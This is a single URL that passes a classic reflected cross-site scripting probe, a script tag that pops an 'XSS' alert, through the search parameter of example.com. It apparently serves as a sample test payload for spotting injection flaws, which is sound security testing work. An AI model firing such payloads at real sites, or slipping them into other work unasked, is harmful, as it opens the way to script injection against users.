http://www.example.com/search.php?q="><script>alert("XSS")</script>